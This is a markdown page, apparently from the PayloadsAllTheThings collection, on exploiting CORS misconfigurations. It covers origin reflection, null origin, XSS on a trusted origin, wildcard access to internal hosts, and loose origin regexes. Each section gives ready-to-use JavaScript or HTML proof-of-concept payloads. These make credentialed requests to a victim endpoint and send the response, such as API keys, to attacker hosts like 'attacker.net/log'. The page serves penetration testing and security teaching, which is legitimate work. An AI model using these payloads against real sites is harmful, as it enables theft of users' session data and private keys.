index.md (10340B)
1 --- 2 title: "CORS Misconfiguration" 3 topic: "CORS Misconfiguration" 4 topicSlug: "cors-misconfiguration" 5 sourcePath: "CORS Misconfiguration/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/CORS%20Misconfiguration/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # CORS Misconfiguration 12 13 > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker's site using the victim's credentials. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Requirements](#requirements) 19 * [Methodology](#methodology) 20 * [Origin Reflection](#origin-reflection) 21 * [Null Origin](#null-origin) 22 * [XSS on Trusted Origin](#xss-on-trusted-origin) 23 * [Wildcard Origin without Credentials](#wildcard-origin-without-credentials) 24 * [Expanding the Origin](#expanding-the-origin) 25 * [Labs](#labs) 26 * [References](#references) 27 28 ## Tools 29 30 * [s0md3v/Corsy](https://github.com/s0md3v/Corsy/) - CORS Misconfiguration Scanner 31 * [chenjj/CORScanner](https://github.com/chenjj/CORScanner) - Fast CORS misconfiguration vulnerabilities scanner 32 * [@honoki/PostMessage](https://tools.honoki.net/postmessage.html) - POC Builder 33 * [trufflesecurity/of-cors](https://github.com/trufflesecurity/of-cors) - Exploit CORS misconfigurations on the internal networks 34 * [omranisecurity/CorsOne](https://github.com/omranisecurity/CorsOne) - Fast CORS Misconfiguration Discovery Tool 35 36 ## Requirements 37 38 * BURP HEADER> `Origin: https://evil.com` 39 * VICTIM HEADER> `Access-Control-Allow-Credential: true` 40 * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` 41 42 ## Methodology 43 44 Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`. 45 46 ### Origin Reflection 47 48 #### Vulnerable Implementation 49 50 ```powershell 51 GET /endpoint HTTP/1.1 52 Host: victim.example.com 53 Origin: https://evil.com 54 Cookie: sessionid=... 55 56 HTTP/1.1 200 OK 57 Access-Control-Allow-Origin: https://evil.com 58 Access-Control-Allow-Credentials: true 59 60 {"[private API key]"} 61 ``` 62 63 #### Proof Of Concept 64 65 This PoC requires that the respective JS script is hosted at `evil.com` 66 67 ```js 68 var req = new XMLHttpRequest(); 69 req.onload = reqListener; 70 req.open('get','https://victim.example.com/endpoint',true); 71 req.withCredentials = true; 72 req.send(); 73 74 function reqListener() { 75 location='//attacker.net/log?key='+this.responseText; 76 }; 77 ``` 78 79 or 80 81 ```html 82 <html> 83 <body> 84 <h2>CORS PoC</h2> 85 <div id="demo"> 86 <button type="button" onclick="cors()">Exploit</button> 87 </div> 88 <script> 89 function cors() { 90 var xhr = new XMLHttpRequest(); 91 xhr.onreadystatechange = function() { 92 if (this.readyState == 4 && this.status == 200) { 93 document.getElementById("demo").innerHTML = alert(this.responseText); 94 } 95 }; 96 xhr.open("GET", 97 "https://victim.example.com/endpoint", true); 98 xhr.withCredentials = true; 99 xhr.send(); 100 } 101 </script> 102 </body> 103 </html> 104 ``` 105 106 ### Null Origin 107 108 #### Vulnerable Implementation 109 110 It's possible that the server does not reflect the complete `Origin` header but 111 that the `null` origin is allowed. This would look like this in the server's 112 response: 113 114 ```ps1 115 GET /endpoint HTTP/1.1 116 Host: victim.example.com 117 Origin: null 118 Cookie: sessionid=... 119 120 HTTP/1.1 200 OK 121 Access-Control-Allow-Origin: null 122 Access-Control-Allow-Credentials: true 123 124 {"[private API key]"} 125 ``` 126 127 #### Proof Of Concept 128 129 This can be exploited by putting the attack code into an iframe using the data 130 URI scheme. If the data URI scheme is used, the browser will use the `null` 131 origin in the request: 132 133 ```html 134 <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script> 135 var req = new XMLHttpRequest(); 136 req.onload = reqListener; 137 req.open('get','https://victim.example.com/endpoint',true); 138 req.withCredentials = true; 139 req.send(); 140 141 function reqListener() { 142 location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText); 143 }; 144 </script>"></iframe> 145 ``` 146 147 ### XSS on Trusted Origin 148 149 If the application does implement a strict whitelist of allowed origins, the 150 exploit codes from above do not work. But if you have an XSS on a trusted 151 origin, you can inject the exploit coded from above in order to exploit CORS 152 again. 153 154 ```ps1 155 https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script> 156 ``` 157 158 ### Wildcard Origin without Credentials 159 160 If the server responds with a wildcard origin `*`, **the browser does never send 161 the cookies**. However, if the server does not require authentication, it's still 162 possible to access the data on the server. This can happen on internal servers 163 that are not accessible from the Internet. The attacker's website can then 164 pivot into the internal network and access the server's data without authentication. 165 166 ```powershell 167 * is the only wildcard origin 168 https://*.example.com is not valid 169 ``` 170 171 #### Vulnerable Implementation 172 173 ```powershell 174 GET /endpoint HTTP/1.1 175 Host: api.internal.example.com 176 Origin: https://evil.com 177 178 HTTP/1.1 200 OK 179 Access-Control-Allow-Origin: * 180 181 {"[private API key]"} 182 ``` 183 184 #### Proof Of Concept 185 186 ```js 187 var req = new XMLHttpRequest(); 188 req.onload = reqListener; 189 req.open('get','https://api.internal.example.com/endpoint',true); 190 req.send(); 191 192 function reqListener() { 193 location='//attacker.net/log?key='+this.responseText; 194 }; 195 ``` 196 197 ### Expanding the Origin 198 199 Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header. 200 201 #### Vulnerable Implementation (Example 1) 202 203 In this scenario any prefix inserted in front of `example.com` will be accepted by the server. 204 205 ```ps1 206 GET /endpoint HTTP/1.1 207 Host: api.example.com 208 Origin: https://evilexample.com 209 210 HTTP/1.1 200 OK 211 Access-Control-Allow-Origin: https://evilexample.com 212 Access-Control-Allow-Credentials: true 213 214 {"[private API key]"} 215 ``` 216 217 #### Proof of Concept (Example 1) 218 219 This PoC requires the respective JS script to be hosted at `evilexample.com` 220 221 ```js 222 var req = new XMLHttpRequest(); 223 req.onload = reqListener; 224 req.open('get','https://api.example.com/endpoint',true); 225 req.withCredentials = true; 226 req.send(); 227 228 function reqListener() { 229 location='//attacker.net/log?key='+this.responseText; 230 }; 231 ``` 232 233 #### Vulnerable Implementation (Example 2) 234 235 In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain. 236 237 ```ps1 238 GET /endpoint HTTP/1.1 239 Host: api.example.com 240 Origin: https://apiiexample.com 241 242 HTTP/1.1 200 OK 243 Access-Control-Allow-Origin: https://apiiexample.com 244 Access-Control-Allow-Credentials: true 245 246 {"[private API key]"} 247 ``` 248 249 #### Proof of concept (Example 2) 250 251 This PoC requires the respective JS script to be hosted at `apiiexample.com` 252 253 ```js 254 var req = new XMLHttpRequest(); 255 req.onload = reqListener; 256 req.open('get','https://api.example.com/endpoint',true); 257 req.withCredentials = true; 258 req.send(); 259 260 function reqListener() { 261 location='//attacker.net/log?key='+this.responseText; 262 }; 263 ``` 264 265 ## Labs 266 267 * [PortSwigger - CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) 268 * [PortSwigger - CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) 269 * [PortSwigger - CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack) 270 * [PortSwigger - CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack) 271 272 ## References 273 274 * [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298) 275 * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/) 276 * [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://web.archive.org/web/20250426222841/https://hackerone.com/reports/426147) 277 * [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://web.archive.org/web/20190820201328/https://hackerone.com/reports/430249) 278 * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://web.archive.org/web/20171230084544/https://hackerone.com/reports/168574) 279 * [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://web.archive.org/web/20230323053559/https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) 280 * [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://web.archive.org/web/20260302141111/https://portswigger.net/web-security/cors) 281 * [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://web.archive.org/web/20250512191501/https://hackerone.com/reports/235200) 282 * [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - October 14, 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) 283 * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://web.archive.org/web/20260204152901/https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) 284 * [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14, 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)